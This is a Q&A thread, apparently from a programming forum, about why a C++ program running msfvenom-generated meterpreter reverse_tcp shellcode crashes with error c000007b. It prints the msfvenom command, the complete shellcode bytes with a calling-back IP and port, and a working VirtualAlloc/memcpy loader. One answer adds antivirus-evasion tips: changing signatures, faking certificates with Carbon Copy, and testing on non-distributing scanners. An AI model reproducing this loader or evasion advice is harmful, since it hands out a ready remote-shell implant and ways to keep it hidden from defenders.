# Can't inject meterpreter shellcode in c++ code

Tags: shellcode, meterpreter, c++

I want to inject meterpreter shellcode in a c++ program.

When I create .exe file in msfvenom, I try it in my virtual machine (Windows 7) and it works well.

But when I create shellcode and inject it into a c++ file, the program compiles successfully but crashes when I launch it in my VM.

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.133 LPORT=4444 -f c -o main2.txt
```

Here is my c++ code (compiled in x64 debug mode with Microsoft Visual Studio):

```
#include <iostream>
#include <Windows.h>
int main()
{
char shell[] = 
    "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
    "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
    "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
    "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
    "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
    "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
    "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
    "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
    "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
    "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
    "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
    "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
    "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
    "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
    "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
    "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
    "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xd0\x85\x41\x54\x49\x89\xe4"
    "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
    "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
    "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
    "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
    "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
    "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
    "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
    "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
    "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
    "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
    "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
    "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
    "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
    "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
    "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
    "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
    "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

void* exec = VirtualAlloc(0, sizeof shell, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shell, sizeof shell);
((void(*)())exec)();

return 0;

}
```

Here is the error:

```
the application was unable to start correctly: c000007b
```

What is my mistake?

Answer (score 1):

Searching `error 0xc000007b`

I found this description of the error:

`Reasons of Windows error code 0xc000007b The error code means an invalid image format. Specifically, you are attempting to start an application which is designed to run on 64-bit operating system. But your computer is running 32-bit Windows.`

Answer (score 0):

Try to generate `windows/meterpreter/reverse_tcp` (it is 32 bit). Maybe the visual executable is 32 bit.

Answer (score -1):

You are on a 32 bit system, so you cannot run 64 bit applications, in visual studio above it will put x64, change it to x86, if not, look for another c++ template and it should let you, I personally have done this method, I have added "printf" with random stuff, to change the signature of the executable, and I have added information with resource hacker to the executable to lower the detection, I think in antiscan. me only detects it 4 antivirus, you can also use Carbon Copy to add web certificates to the executable, and do not upload it to virustotal because antivirus companies will scan it and it will not be undetectable anymore, use antiscan.me or nodistribute.com.